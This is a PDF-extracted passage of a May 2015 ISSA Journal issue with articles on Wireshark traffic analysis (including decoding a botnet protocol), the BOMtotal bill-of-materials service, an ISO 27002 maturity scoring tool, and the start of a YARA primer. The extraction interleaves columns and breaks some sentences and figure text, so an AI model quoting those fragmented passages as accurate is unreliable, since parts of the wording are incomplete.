libpcap/WinPcap layer). A filter can be as simple as specify2 https://isc.sans.edu/forums/diary/

Wireshark | Didier Stevens

sometimes very sophisticated) to dissect the
bytes it finds in the capture into a hierarchy
of protocols with the appropriate fields. In
our example, the first layer of our selected
packet is the frame, which contains the captured bytes and metadata like the timestamp
of the capture (date, time, and microseconds). The next layer is the Ethernet layer,
where you can see the source and destination
MAC addresses. Then you have the IPv4 layer with its source and destination IP addresses, followed by the UDP layer with its ports.

Figure 1 - Main Wireshark window with packet list, packet details, and packet bytes panes

ing that you just want to capture the IP network protocol and
nothing else, or all traffic from or to a host, or a combination.
This filtering is done with filter expressions according to the
Berkeley Packet Filter (BPF) standard.
Only network traffic that satisfies the BPF filter will be seen by
Wireshark and ultimately saved to disk. And this points out a
potential problem with capture filters: if your filter expression
is too narrow, you will miss data that you can never recover
without redoing the capture. For example, say you use a capture filter for TCP packets. But when you do the analysis, you
realize you would also like to have the network names for the
IP addresses you see. Since normal DNS is UDP and not TCP,
it was not captured and thus you have no name resolution.
I advise to only use a capture filter if you do not have the
resources to capture all traffic. If you do have the resources
(disk space, bandwith), capture all traffic and filter it during
your analysis with display filters.

Analyzing traffic
In figure 1 you see the Wireshark GUI with an open capture
file. Wireshark used pcap capture files by default, but since
recent versions, the pcang format is the default.
Below the menu and toolbars, Wireshark has three panes:
1. Packet list pane
2. Packet details pane
3. Packet bytes pane
The packet list pane shows you the packets in the capture file:
one packet per line, and the packets are numbered. A couple
of columns help you make sense of what is displayed: Time,
Source, Destination, Protocol. The packet that is selected in
the list pane (packet #1 in the figure) is displayed below in the
details pane and the bytes pane.
The details pane show you the results of the protocol dissectors. Wireshark uses protocol dissectors (these are programs,

The UDP payload turns out to be DNS, and

that is the last layer you see. I have also expanded the tree view of this DNS layer so
that you can see the different fields. In this
example, you can see that a DNS request is
made for the A record associated with www.

But how do these dissectors perform this seemingly magic

trick of dissecting a complete frame? First of all, Wireshark
knows from which type of network interface it is capturing
and can thus infer the protocol to be expected. When capturing from an Ethernet card, it will try to dissect the bytes
found in the frame according to the Ethernet protocol. In the
Ethernet protocol, there is a field (Type) that specifies the type
of the Ethernet payload. In this example it is IPv4. Thus the
IPv4 dissector is activated to dissect the payload according to
the IPv4 protocol. This protocol too has a field (Protocol) that
indicates the type of its payload. In our example, it is UDP,
thus the UDP dissector starts to do its work. The UDP dissector sees that the destination port is 53, thus it will activate
the DNS dissector. Sometimes there is no type, port, or other
field that clearly indicates what protocol is present. Then the
dissectors will use trial and error and heuristics to try to detect the right protocol.
The bytes pane displays the bytes in hexadecimal representation.

A couple scenarios
We can all come up with scenarios where network engineers
use Wireshark: troubleshooting network communications
like lost packets, long delays, time outs, and others. But here I
want to illustrate some simple, practical scenarios that can be
very useful in your professional life.
You try to SSH into a server but you get no connection. What
is wrong? Launch Wireshark, start capturing, and restart
your SSH connection. Now stop Wireshark and use a display
filter to see TCP packets to or from the server (tcp and ip.addr
== Do you see a SYN packet going to the server?
Good. Now do you see a SYN/ACK packet coming from the
server? No? OK, then adapt your filter to include ICMP (Internet control message protocol). Do you see ICMP traffic?
May 2015 | ISSA Journal 27

Wireshark | Didier Stevens

Figure 2 - Dialog window appearing when exporting HTTP objects: it lists all HTTP objects
that can be saved (exported)

No? Then it is 99% likely that there is a firewall between your

workstation and the server, and that firewall is dropping your
packets. So you will need to ask a network engineer to add a
firewall rule so that you can access the server.
A suspicious website
As incident handler, you are informed of a website that looks
suspicious. From a malware lab machine, you visit the website
and surf through its links, with Wireshark capturing all network traffic for you in the background, of course. Now stop
surfing and stop Wireshark. In the Wireshark menu go to File
/ Export Objects / HTTP (figure 2). I visited the issa.org website, and here you see all the files that make up this website.
With the Save buttons, you can save all files to disk for later
analysis with your anti-malware tools.
An IDS alert
You are tasked with the analysis of an IDS alert. A UDP packet
triggered a rule. The alert mentions the IP addresses and ports.
And then a bunch of hex digits for the payload: e67b01000001
The destination port is 53. You are not very familiar reading
hex (that is an understatement). What do you do?

Figure 3 - Window used when importing a hex dump

Load your text file with the payload (payload.hex), select

Dummy header, UDP, and enter the source and destination
ports. Click OK.
Wireshark has generated a packet for you from the provided
hex text, and dissected it (figure 4). Now you have a much
better chance at understanding the hex payload.
A botnet
There is a botnet active in your network; you are tasked with
the analysis of its network traffic. Take a look (figure 5).
You just see TCP connections, with the data send and received displayed as hexadecimal numbers. The hexadecimal
data makes no sense to you. It is a proprietary protocol; Wireshark has no dissectors for it and just displays data. Its up to
you to understand what these hex bytes mean. But today is
your lucky day. With the help of Google, you found the blog
of a security researcher who reversed the protocol (figure 6).
He even wrote a custom dissector in Lua (figure 7).
You download the dissector, drop it in your plugin folder, and
start Wireshark again. Open the capture file and take a look
(figure 8).

Take the hex bytes, and arrange them in a text file like this
(16 digits per file):
000000 E6 7B 01 00 00 01 00 00 00 00 00 00 03 77
77 77
000010 06 67 6F 6F 67 6C 65 03 63 6F 6D 00 00 01
00 01
Prefix the hex bytes with a counter: 000000, 000010,
Start Wireshark and select File / Import from Hex Dump (figure 3).
28 ISSA Journal | May 2015

Figure 4 - Tree view of DNS data in the packet details pane after importing a
hex dump

Wireshark | Didier Stevens

Figure 5 Main Wireshark window displaying the unknown botnet traffic

Figure 6 Format of
the botnet protocol:
first byte is the
version, second byte
the type, third byte
is the command,
and remaining bytes
contain command

Compared to the previous screenshot of

the main Wireshark window, instead of
just TCP connections with hexadecimal
data, now you see what it means. First,
you see the botnet C&C sending a ping
request, answered with a ping response
by the botnet client. Second, you see a
date request by the C&C, answered by
the client with a response (20140510).
Third is a reverse request, where you see
that the client reversed the string for the
C&C. And finally, the C&C issues a download request (to
download a Trojan), and the client replies with a success response: the Trojan was downloaded and executed.
Because you installed the Lua dissector, you see the botnet
commands instead of the raw hexadecimal data: now you can
understand what the botnet is doing.

Wireshark is a very powerful, versatile packet analysis tool.
It has many powerful features for experienced network engineers, but also powerful features for occasional users, like
I tried to illustrate with some scenarios. It is very extensible:
it accepts new dissectors written in C and in Lua. And did I
mention that it is free? And open-source?
Laura Chappell ,Wireshark Network Analysis (Second Edition): The Official Wireshark Certified Network Analyst Study
Guide, Chappell University (March 1, 2012).
Laura Chappell, Troubleshooting with Wireshark: Locate
the Source of Performance Problems, Chappell University
(January 26, 2014).

About the Author

Figure 7 Part of the Lua code for the BOTNET01 protocol dissector

Figure 8 mMain Wireshark window displaying the dissected botnet traffic

Didier Stevens (Microsoft MVP Consumer Security, SANS ISC Handler, Wireshark
Certified Network Analyst, CISSP, GSSP-C,
Server 2008, RHCT, CCNP Security, OSWP) is a member of
the Belgian ISSA Chapter and
an IT security consultant currently working at a large Belgian financial corporation. Didier started his own company
in 2012 to provide IT security
training services (http://DidierStevensLabs.com). Didier also
provides Wireshark training.
You can find his open source
security tools on his IT security
related blog at http://blog.DidierStevens.com.
May 2015 | ISSA Journal 29




Software Supply Chain

Management with BOMtotal
By Jonathan Knudsen
This article describes BOMtotal, a free service that generates a bill of materials from any
executable code.

nyone who uses software has a right to know whats

inside it. Just as you can examine food items in a supermarket to see the ingredients, you should be able
to know whats inside software that you use or might use.
Enabling anyone to generate a bill of materials (BOM)list
of ingredientsfor any piece of software results in a better
world for all of us. Buyers gain visibility into software during
their procurement cycles by requesting bills of materials
from builders. Builders examine bills of materials for their
own products to make sure they have no surprises. Ordinary
people benefit because when builders and buyers effectively
manage their software supply chains, the entire ecosystem
becomes safer, more reliable, and more secure.

Meet your software supply chain

Whether or not you are fully aware of it, your organization
depends on a complex, interrelated mesh of software. Vulnerabilities and failures in your software supply chain can have
profound effects on your day-to-day operations, your bottom
line, your reputation, and your survival.
In this article, the term software is used in its broadest sense,
including any code running on any type of processor. Software includes the following:
Traditional desktop software
Smart phone apps
Cash machines
Gas pumps

Embedded Internet of Things devices like coffee pots

or light bulbs

Cruise missiles
Game consoles

30 ISSA Journal | May 2015

Wi-Fi access points

Telecommunication infrastructure
Medical devices

Power grid equipment


The typical organizations software attack surface includes

a dizzying array of devices and packages, everything from
desktop word processors to networked printers to heating
and air conditioning equipment.
Remember Heartbleed?
The Heartbleed vulnerability shined a harsh and unforgiving
light on software supply chain management, or the lack of it,
as organizations worldwide struggled to answer fundamental
Which of our products contains a vulnerable version
of openssl?
Which of the devices and software packages that we
use has a vulnerable version of openssl?
Software supply chain management has been a problem; it
continues to be a problem as new vulnerabilities are discovered in third-party software components on a daily or hourly
basis. Heartbleed was just one particular high-profile vulnerability with a name that captured the worlds attention.

Software supply chain management

Software is created by builders and used by buyers. A builder
assembles a software product; a buyer purchases software to
provide a service. Builder organizations include the following:
Network equipment manufacturers
Medical device manufacturers

Software Supply Chain Management with BOMtotal | Jonathan Knudsen

Industrial controls vendors

Internet of Things (IoT) device manufacturers

Independent software vendors (ISVs)

Nearly all software is built by starting with third-party or

open source components. This makes sense: it dramatically
reduces time to market by providing functionality that would
otherwise be slow and difficult to create from scratch. On the
other hand, third-party components come with their own
baggage, such as known vulnerabilities and usage licenses.
These components are a supply chain; vulnerabilities in components are often exposed in the builders products. Any
builder concerned with security and safety needs to actively
manage this software supply chain. When new vulnerabilities
are discovered in software components, responsible builders
will incorporate newer, vulnerability-free versions of the
components into their products and issue patches to customers as appropriate. This is the builder software supply chain.
A buyer purchases software and equipment and provides a
service to its customers. Interruptions or failures in that service are expensive, embarrassing, and possibly deadly. Example buyer organizations include the following:
Network operators
Public utilities


Buyer: Im thinking about purchasing your product, but want

to manage my software supply chain. Can you give me the
software BOM for that product before I buy it?
Builder: OK, I generated the BOMbut it contained some
things that surprised us. Were going to clean up our project
and get you a better BOM in a few days.
Here is another example in which a fastidious builder opens
a buyers eyes:
Builder: Hello, I think youd like to use my product, and here
is the software BOM so you can see what it contains. Im also
including a known vulnerability analysis so you can see what
a good job were doing managing our software supply chain.
Buyer: Wow, thats great! It looks like you are really on top of
your supply chain. I wonder if our other vendors are tracking
their software supply chains this way. We should ask them for
software BOMs and known vulnerability analysis.

Using BOMtotal for supply chain management

BOMtotal is a free service that generates a bill of materials
from any executable code. It is available online at www.bomtotal.com/. BOMtotal belongs to a new category of solutions:
software composition analysis (SCA).
All you need to do is upload software. What can you upload?
BOMtotal consumes a wide variety of executable code in a
wide variety of packaging. Try it out and see!



Buyers need to protect themselves from the products theyre

purchasing to manage risk. This is the buyer software supply
chain. Their vendors might or might not have good practices
in place to manage vulnerabilities in the supply chain. Prudent buyers will verify and validate their suppliers supply
chains. When new vulnerabilities are discovered in components, buyers need to understand their affected assets and
take action accordingly to mitigate risk.
In reality, many organizations are both builders and buyers.
They purchase products and software from various vendors,
and they write their own software as well. This means they
face the challenges of managing both the builder and buyer
software supply chains.

First step: Bill of materials

The very first step in managing software supply chains is
knowing whats inside your software. A software bill of materials (BOM) is a list of components that are contained in a
particular software package or product.
Buyers and builders can start a simple conversation about
supply chain management by exchanging software BOMs.
These types of conversations can only lead to better products.
Here is an example where the buyer asks a simple question
that reveals the builders need to pay better attention to the
supply chain:

Dont Miss This Web Conference!

Breach Report: How Do You Utilize It?

2-Hour Live Event

Scheduled for 9:00 am PDT, 12:00 pm EDT,

5:00 pm London, Tuesday, May 26, 2015.
Once again, the new data breach reports are being published. The question is, will it be another
round of the sky is falling and the world is ending, or are we, as security professionals, finally
succeeding in protecting our assets?
This year we would like to look at best practices
concerning the content of these reports. How do
we make the best use of the information that is
released? Join our industry experts as they discuss the latest breach reports and provide insight
into current trends and even potential solutions.

CLICK for more information or to register.

Join the conversation: #ISSAWebConf
For more information on our webinar schedule:
May 2015 | ISSA Journal 31

Software Supply Chain Management with BOMtotal | Jonathan Knudsen

Here are a few examples you can upload:
Desktop applications for OSX, Linux, and Windows;
Install them first, then zip (or otherwise package) the
application directory and upload it
Unencrypted Android or iOS apps

Firmware files for x86, Arm, or other architectures

(BOMtotal cannot analyze encrypted firmware images)
Virtual disk images or ISO files
Java platform applications

See the BOMtotal FAQ for more specific information.

The service is extremely easy to use. When you first navigate
to bomtotal.com, youll see the following:

using old or excessively vulnerable components. Next time a

pervasive and alarming vulnerability like Heartbleed comes
along, youll be able to quickly locate the software that contains the affected component.
If youre a buyer organization, you can upload your products
nightly or weekly builds to BOMtotal and verify that your
BOM contains exactly what you expected. For your buyer customers who are savvy to software supply chain management, you can provide a link to your products BOM to
demonstrate what a good job youre doing. Your customers
can use BOMtotal to see whats inside your products, so it
makes sense that you do the same and see what they can see.

Price tag?
BOMtotal is a free service, and as such it allows you to get
your feet wet with software supply chain management. It provides you with crucial visibility into the software you build
and buy, allowing you to make informed decisions about risk.
Also, keep in mind the following:
BOMtotal can only detect the components it knows about.
At this writing (April 2015), BOMtotal has a database of
over 1,000 software components, but obviously it cannot
find a component if it is not already in the database.

Press Upload a file and choose a file. As soon as you upload

something, BOMtotal figures out what is inside and presents
you with a BOM that lists the contained components. You can
bookmark the URL if youd like to return to your results later; and you can also download the BOM as a machine-readable file.
Figure 1 is the BOM from a popular web meeting package for
a desktop computer.
Figure 2 a firmware image from a surveillance video recording system.
Lets say youre a buyer organization and youd like to manage your supply chain. First,
collect all the software that
youre using in your organization. Upload all of it to BOMtotal and keep bookmarks of
the BOMs. Youll be able to
identify risky packages that are

All BOMtotal results are publicly available to anyone that

has the link to the BOM. If you are using BOMtotal to scan
your own software while its in development, others will be
able to see your results if they are able to obtain a link or
the hash value for the upload.
BOMtotal helps you manage the components in your
software supply chain, which helps you manage known
vulnerabilities. To fully manage vulnerabilities in the
software you use or create, you should also locate and remediate unknown vulnerabilities. Fuzz testing is an effective method for locating unknown vulnerabilities.

BOMtotal is a free software composition analysis service
that allows anyone to see the BOM for any piece of software.
BOMtotal democratizes software supply chain management
by giving everyone visibility into the components that are
used to build software. 2015 is the year of software supply
chain management. If youre not already actively managing
your software supply chain, you can get started today with

About the Author

Figure 1
32 ISSA Journal | May 2015

Figure 2

Jonathan Knudsen is a principal security

engineer at Codenomicon, where he enjoys
breaking software. Jonathan is the author of
books about 2D graphics, cryptography, mobile application development, Lego robots,
and pregnancy. He lives with his wife, four
children, and two dogs in a noisy house in
North Carolina. He may be reached at jonathan@codenomicon.com.

See Globally. Defend Locally.
Distilling the Global Complexities of Cybersecurity
Down to Your City, Your Network, Your Shot at a
Decent Nights Sleep

Spring 2015
Houston - May 13
Atlanta - May 27 & 28
Portland - June 17
Fall 2015
Detroit - September 16 & 17
St. Louis - September 22 & 23
Cincinnati - October 6
Denver - October 15
Dallas - October 28 & 29
Bay Area - November 4
Seattle - November 11 & 12

Register for a conference near you with these discount

Two-Day Conference:
ISSA: $100 off a Two-Day Conference Pass ($195)
ISSASWP: $200 off SecureWorld Plus Training ($595)
ISSAEO: $25 off Exhibits & Open Sessions Pass (FREE)
One-Day Conference:
ISSA: $50 off a One-Day Conference Pass ($115)
ISSASWP: $100 off SecureWorld Plus Training ($445)
ISSAEO: $25 off Exhibits & Open Sessions Pass (FREE)
For our complete schedule, visit

Web Conferences:

SecureWorld Post: The most up-to-date

cybersecurity news compiled daily.
Subscribe Today!

Featured Keynotes:

Carl Herberger

Vice President of Security

Solutions, Radware

Colonel Cedric Leighton

USAF (ret.) and CEO, Cedric
Leighton Associates

Christopher Pierson

Demetrios Lazarikos

Dr. Marjie T. Britz

Larry Ponemon

General Counsel & Chief

Security Officer, EVP

Professor of Criminal Justice

Clemson University

IT Security Researcher
and Strategist

Chairman and Founder

of the Ponemon Institute




Using a Governance Tool

By Joel Weise ISSA Distinguished Fellow, Vancouver Chapter
The author discusses a basic security health-check tool that an organization can use to evaluate
its data processing environment against ISO standard 27002.
This article discusses a basic security health-check tool that
an organization can use to evaluate its data processing environment against ISO standard 27002. The approach described
compares ones state of compliance against a defined security maturity model. The same health-check approach can be
used with other standards such as NIST, HIPAA, or PCI.

nformation security is a business problem. It must be

addressed via the identification, coordination, and deployment of core resources and competencies to manage
risks and aligned with strategic goals, operational criteria,
and compliance requirements. To sustain enterprise-wide
security, an organization must move toward a security governance process that is strategic, adaptive, cost-efficient, and
repeatable. Such a process must account for constant changes
in policies, procedures, and technologies. The question then
is, how to design such a process?
This article describes the use of an information security
health-check tool that focuses on the creation of a security
governance framework; the assumption being that such a
framework is recognized as a critical component to a holistic and integrated security program. Unlike other technical
tools that can be used to detect potential threat vectors or
configure hardware or software, this tool addresses the need

Information Security Management

System ISMS
Implementing an ISMS is an information security effort that
allows an organization to utilize controls that are capable of
responding to new and different threats over time. It implements a security architecture that matures over time to address evolving threats. The security architecture is designed,
implemented, and managed within the context of a continuous improvement schema. In this way the organization utilizes security as a vehicle for innovation that focuses on driving
predictive and proactive change, and utilizes a dynamic security architecture as well as operational processes and controls. The sample tool presented here is used to support the
development of the ISMS.

34 ISSA Journal | May 2015

to formalize a governance framework to enable compliance to

different regulatory and standards-based mandates. The example that will be demonstrated in this article is addressing
the ISO 27001 and 27002 standards [1, 2]. ISO 27001 describes
an information security management system (ISMS) and ISO
27002 describes security control objectives. The sample tool
uses the security control objectives noted in the ISO 27002
standard. Note that ISO can be used as a baseline to cross reference compliance to other standards such as PCI [3] as well
as regulatory mandates such as HIPAA [4].
The question as to why security governance is relevant is
straightforward: security governance allows an organization
to address various issues it faces including:
Complexity and the need to simplify the management of
the organization in general and security in particular
Compliance and the need to address various regulatory
Certification, which is often necessary as a business differentiator
Service-level support for areas such as security, reliability,
availability, and agility
Addressing these common issues via security governance allows an organization to be more competitive, efficient, profitable, and transparent and reduce its overall liability. In short,
a security-governance framework allows an organization to
formally integrate security as a business function, rather than
a technical function incorrectly relegated to IT services.
The overall objectives of a governance tool are to perform a
gap analysis of an organizations processing environment,
enable the creation of an ISO-based information security
management system (ISMS) [5], and then determine its current and target security maturity levels. The security maturity model used is noted in the sidebar. The purpose of the
maturity model is to provide a consistent baseline against
which one can be measured. The gap analysis will identify areas where an organization has an appropriate level of security
maturity and adequate control measures. The analysis will
also identify those areas that are deficient and may result in
an organization being in non-compliance. An organization
out of compliance may be subject to different risks, threats,

Using a Governance Tool | Joel Weise

and vulnerabilities that may likewise place it in a state facing
increased scrutiny, liability, and financial and legal exposure.

The governance tool

The functioning of the tool is relatively simple. The following
steps describe how the tool is used:
1. Identify the applicable baseline to measure against
2. Identify the target security maturity level applicable to
the organization
3. Measure the organizations compliance to each relevant
security control objective against the standardized target security maturity model level
4. Create a gap analysis and identify areas for improvement
In the first step, ISO 27002:2005 has been identified as the
baseline against which the organizations security maturity
will be measured. This was selected because ISO is an internationally recognized standard; an organization can be certified to it, and it represents industry best practice. Other popular baselines that may be used by the tool are PCI, HIPAA,
and NIST 800-53 [6]. Thus the same approach presented here
could also be used to measure ones compliance to these standards and legal requirements.

Users should recognize that to ensure a comprehensive assessment all security control objectives and related controls
noted within the standard should be integrated into the tool.
In this example, all 11 control sections, all associated security control objectives, and all individual controls of the ISO
27002:2005 standard were integrated into the tool. These
were likewise structured as they are in the standard. The control sections from the ISO standard include:
Access Control

Asset Management

Business Continuity Management

Communications and Operations Management


Human Resources Security

Information Security Incident Management

Information Systems Acquisition, Development, and

Organization of Information Security
Physical and Environmental Security
Security Policy

In the second step, we review the security maturity model and

determine the target level for the organization in question.

Security Maturity Model

Level 1 Lacking Basic Security
The organizations information security infrastructure is best
characterized as immature or simply nonexistent. Little effort has
been completed towards creating and sustaining a secure and
compliant IT environment. Those efforts made are often reactive,
addressing issues only after their discovery by users, auditors, customers, or others outside of the information security team. A high
probability exists that the organization is currently suffering losses
but lacks the means of detecting the attack. This lack of security infrastructure subjects the organization to substantial and unquantifiable levels of risk.

Level 2 Ad Hoc Security

While some effort has been made in the area of IT security, such
efforts tend towards point solutions not guided by an organization-wide strategy. Where needed, IT security policies, processes,
standards, and controls are found, although they are not widely
and consistently developed, communicated, implemented, or
managed. Organizations may reach Level 2 despite lacking a structured, integrated plan to address IT security and compliance problems. The organization remains subject to substantial risk of loss.

Level 3 Security Planning

The organization has begun to realize the strategic, competitive,
and regulatory advantages for developing and maintaining a
consistent IT security posture throughout its environment. Security, privacy, and compliance strategies are in place, along with a
transformational road map to achieving IT security and compliance goals. While deficiencies exist, the organization is aware and
strives to address them. Organizations at Level 3 are characterized
by a proactive approach to IT security with respect to infrastruc-

ture, applications, and services. Information security is not an afterthought and is instead part of a holistic approach to IT operations.

Level 4 Effective Security

The IT security capabilities of the organization are measurable,
predictable, and repeatable. All security and compliance requirements are addressed through the implementation of an integrated
security architecture. The organization utilizes a well-defined governance process for engaging IT security into service development
and information-protection life cycles. IT security risks are consistently measured and managed in accordance with well-defined
metrics, policies, and service agreements. The organization has
achieved compliance (and possibly certification) to all applicable
legal, regulatory, and other mandates. The organization can be
described as abiding by the best practices of its industry. Risk of
IT-related loss is substantially reduced.

Level 5 Adaptive Security

The organization has moved beyond regulatory compliance or
industry standards and is focused on continuous process improvement. Data available from management and support infrastructures is used to modify processes to gain efficiencies.
Traceability from business metrics to IT security metrics allows for
lessons learned in one area of an organization to quickly benefit
the whole. IT security leverages automation tools optimized for
specific business operations. This level of innovation focuses on
driving predictive and proactive change through the use of adaptive and dynamic security architectures, processes, and controls.
In terms of information security, organizations at Level 5 are best
described as market leaders.
May 2015 | ISSA Journal 35

Using a Governance Tool | Joel Weise

The security maturity model noted in this article was developed based upon industry best practice and other sources. Its
function is to provide a standardized means of measuring the
level of compliance one has for various control objectives.
This is a subjective exercise, but in general one should consider an organizations peers and the type of business it performs
(e.g., a financial institution should be at least at a level 3 if not
4, while a social media company would more than likely be
at a level 3). There are very few organizations that should fall
below a level 3. For demonstration purposes, we assume the
organization should be at a security maturity level of 4. Note
that this is an average and one may find it acceptable for some
control sections to be ranked lower.
In the third step, as noted in figure 1, each ISO security control objective is scored against the security maturity model.
The scoring follows a range of 1-5 to align with the security maturity model or N/A. N/A scores are discarded and not
counted against the average score for any control section. For
each control under each control objective, a guidance pop-up
window is provided for one to determine the level of compliance against the security maturity model. The guidance is
different for each control under each control objective and is
at the core of how to measure ones compliance against the
security maturity model. The benefit is that a score relative
to the security maturity model is developed verses a binary
yes or no answer that security analysts often make. This will
result in a much more accurate assessment of ones environment.

The overall score for the security policy control section is 2.5,
which is subpar for the target security maturity level for the
organization. Recall that our target security maturity level for
this example was 4. Such a score should tell an organization it
has some work to do in its security policy process.
As each control is scored, an average score is created for each
control section. These are automatically integrated into an
overall score as well as mapped to different graphs as defined
in the tool. For example, a histogram or spider graph can be
included to better illustrate ones level of compliance against
the security maturity model.
With the assumption that all 11 control sections of the ISO
standard are considered in scope, the third step is performed
for all security control objectives under each control section.
Note that even if all 11 control sections are selected, it is possible that some security control objectives may be out of scope.

Figure 2 illustrates how the guidance is provided. These

were developed based upon industry best practice and good
old-fashion experience. Note that the guidance pop-up also
includes the relevant text from the ISO standard. This is included to allow one to quickly reference the applicable control implementation guidance and determine what aspects of
these are applicable to the environment being assessed.
In the example here, using the guidance pop-up a score of 2
was given to A.5.1.1 because the organization does not have
a comprehensive plan for communicating security policies to
all stakeholders ( i.e., it has not been sufficiently published).
A score of 3 was given to A.5.1.2 because although the organization has a policy review process it has not been through
a sufficient number of review iterations to determine its effectiveness. Realize, of course, that the scoring is a subjective
exercise, the results of which are only as good as the security
analyst and the data provided or discovered.

ISO 27002
To provide management direction and support for
the information security in accordance with business
requirements and relevant laws and regulations.
To provide management direction and support for
the information security in accordance with business
requirements and relevant laws and regulations.

Figure 2 Pop-up window with scoring guidance

Determine if a security policy exists.
If no, score = 1
If yes but not endorsed or published, score
If yes, endorsed, and
mechanism exists, score = 4
If yes, endorsed, published, and a revision
The policy should take account of the following:
a) Secuity requirements of individual business applic
ess applications and the
b) Identificati
risks the information
rization, e.g., the need-to-know
c) Policies for information dissemination and autho
ation (see 7.2)
principle and security
classification policies of
d) Consistency between the access control and inform
different systems and
tions regarding protection of
e) relevant legislation and any contractual obliga
access to data or servic
roles in the organization
f) Standard user access profiles for common job
and networked environment that
g) Management of access rights in a distrib
s request, access authorization,
h) Segregation of access control roles, e.g., acces
access admin
s requests (see 11.2.1)
i) Requirements for formal authorization of acces
ls (see 11.2.4)
j) Requirements for periodic review
k) Removal of acces



An information security policy document shall be approved

by management and published and communicated to all
employees and relevant external parties.
The information security policy shall be reviewed at planned
intervals or if significant changes occur to ensure its continuing suitability adequacy and effectiveness.

Security Policy Score

Figure 1 Sample ISO 27002 security control objectives

36 ISSA Journal | May 2015


Using a Governance Tool | Joel Weise

The inclusion or exclusion of any control section or specific control objectives is determined by the security analyst,
based upon the needs of the organization, and performed via
a separate scoping exercise.
This brings us to step four, the creation of the gap analysis.
For brevity, it is assumed that readers are familiar with performing a gap analysis. As such, we will only focus on how
the tool supports the gap analysis; namely, the tool provides
a current-state baseline against the security maturity model.
The tool will display the assigned scores for each security
control objective as well as cumulative scores for an executive
summary. The summary allows an organization a snapshot of
where it should be focusing efforts to raise the security maturity level. Figures 3 and 4 show the overall results. Notice that
the overall score for the organization is 2.73. This is below par
for an organization that should be targeting an overall score
of 4.
Access Control
Asset Management


Business Continuity Management


Communications and Operations Management




Human Resources Security


Information Security Incident Management


Information Systems Acquisition Development and Maintenance


Organization of Information Security


Physical and Environmental Security


Security Policy


Overall Score


Figure 3 Individual scores of each controls section and the overall score

The spider graph (figure 4) is a very effective means of demonstrating where the organization should focus its efforts to
raise the security maturity level. In fact, this organization
should be focusing on a number of areas including security
policy, asset management, and access control to name a few.
The overall scores of the control sections in conjunction with
the individual scores for each control under each control objective enables an organization the ability to tailor a focused
gap analysis and remediation plan in an efficient manner.

The tool demonstrated in this article is an example of a simple
security and governance controls matrix married to a security
maturity model. This is a useful tool that can be implemented in a spreadsheet as was done here, or via the creation of a
dedicated application or other means. A tool such as this can
be designed to support other frameworks such as COBIT [7]
or ITIL [8] and likewise integrate with other security-related
models such as the Capability Maturity Model (CMM) [9].
Using such a tool has the benefits of organizing and rating
applicable security control objectives, diagramming those

Figure 4 Spider graph of each controls section and relative scores

visually, and being agile enough to maintain relevance as

standards and control objectives change. Integrating this tool
with ISO 27002:2013 would be a logical next step. Ultimately such a tool is most useful for establishing a governance
framework and context within which a security architecture
and related business and operational processes can be developed; and these then enable an organization the ability to
comply with those mandates applicable to it.
1. ISO/IEC 27001:2005 Information TechnologySecurity
techniquesInformation security management systems
Requirements, 2005.
2. ISO/IEC 27002:2005 Information TechnologySecurity
techniquesCode of practice for information security management, 2005.
3. Payment Card Industry (PCI) Data Security Standard, v3.0,
4. HIPAA: Health Insurance Portability and Accountability
Act, 1996.
5. ISO/IEC 27001:2005 Information technologySecurity
techniquesInformation security management systems
Requirements, 2005.
6. Special Publication 800-53 Revision 4 Security and Privacy
Controls for Federal Information Systems and Organizations, 2013.
7. Control Objectives for Information and Related Technology
(COBIT) 4.1, 2007.
8. Information Technology Infrastructure Library (ITIL), 2011.
9. Capability Maturity Model Integration (CMMI) Version 1.2
Overview, 2007.

About the Author

Joel Weise has worked in information security for over 30 years. His current research is focused on adaptive security, cloud computing,
cryptographic systems, security governance,
and security maturity modeling. Joel is a
founding member of the ISSA and a member
of the American Bar Association, serving as a subject matter
expert for the Science and Technology working committee. He
may be reached at jmweise@gmail.com.
May 2015 | ISSA Journal 37




Starting with YARA the

Automated Way
By Jordan Berry
This article introduces readers to YARA, its applications, and suggests additional resources that
information security professionals can use to make YARA part of their defensive toolkit.

Information security professionals routinely face an array
of tools and techniques available to perform their job. One
particular toolYARAand a suite of accompanying complementary tools provide a great way to quickly leverage
threat-intelligence information without having extensive expertise in malware analysis. This article introduces readers
to YARA, its applications, and suggests additional resources that information security professionals can use to make
YARA part of their defensive toolkit.

eterans of the information security community are

most often self-taught, technical professionals who
have toiled through many years on the front lines of
IT and network defense. Most have war stories akin to those
of lore and tend to begin with Back when we had no security budget and Snort1 had just been released However, the
industry has begun to morph over the past several years. Security has become a hot topic in the news and more college
students are now specializing in the field. Universities have
built formalized programs for information assurance and
computer security that are now regularly producing young
and eager security professionals who are pursuing jobs with
the government, IT security departments, and private computer security companies. As such, there are many entering
the industry who have yet to face the overwhelming number
of niche tools and scripts available from vendors, co-workers,
and open sources. However, some tools are perhaps more important to know and understand than others.

classify malware samples based on textual or binary patterns

within the files, but its applications are wide-reaching and
available to the novice and experienced, alike. It was created by Victor Alvarez, who is now a software engineer for VirusTotal.2 During the course of his work, he was tasked with
regularly ingesting and classifying malware samples into
particular families and over time found that he usually identified these samples by remembering certain patterns within
the files (for example unique file names, registry keys, mutex
names, domain names, IP addresses, etc.). After realizing he
could build a program and have technology do the analysis
for him, YARA was born. The first version was released in
December 2008 and has seen many iterative enhancements
since. YARA is an incredibly powerful open source tool that
many have written about in blogs and other publications, advocating for its expanded use within the security industry.
The aim of this article is not to re-hash many of the introductions and guides that are already available, but rather point
out the ease with which one can get started. The ease and utility of YARA is amplified by related and complementary open
source YARA tools and YARAs utility to scan a companys

Using open source tools to generate YARA rules

One security tool, among the many organically borne out of

need and ingenuity within the industry, is YARA. It is a tool
designed to help malware researchers efficiently identify and

With the modest beginning of YARA, rules were originally intended to find basic text patterns within files that were
scanned by the custom YARA engine. The tool is much more
powerful today, capable of dissecting executable files, both
ELF (executable and linkable format) and PE (portable executable ) binary files, as well as other modules and additions.
However, with that increased capability comes an onslaught
of complex options that may seem unwieldy to a novice malware analyst.

1 Documents, Snort, accessed April 19, 2015, https://www.snort.org/documents.

2 Victor Alvarez, email message to author, April, 2015.

38 ISSA Journal | May 2015

Starting with YARA the Automated Way | Jordan Berry

The documentation that Victor has assembled provides excellent information on the basic rules and syntax for YARA,
with example rules for many of the common scenarios.3 As
seen in figure 14 below, there are two primary types of sections in YARA rules, strings and the condition. The strings
section is where the pattern(s) should be defined and given
a variable name. The condition section contains the Boolean
logic that provides YARA the necessary instructions to determine if the condition is met for each file it scans.
rule ExampleRule
$my_text_string = text here
$my_hex_string = { E2 34 A1 C8 23 FB }
$my_text_string or $my_hex_string
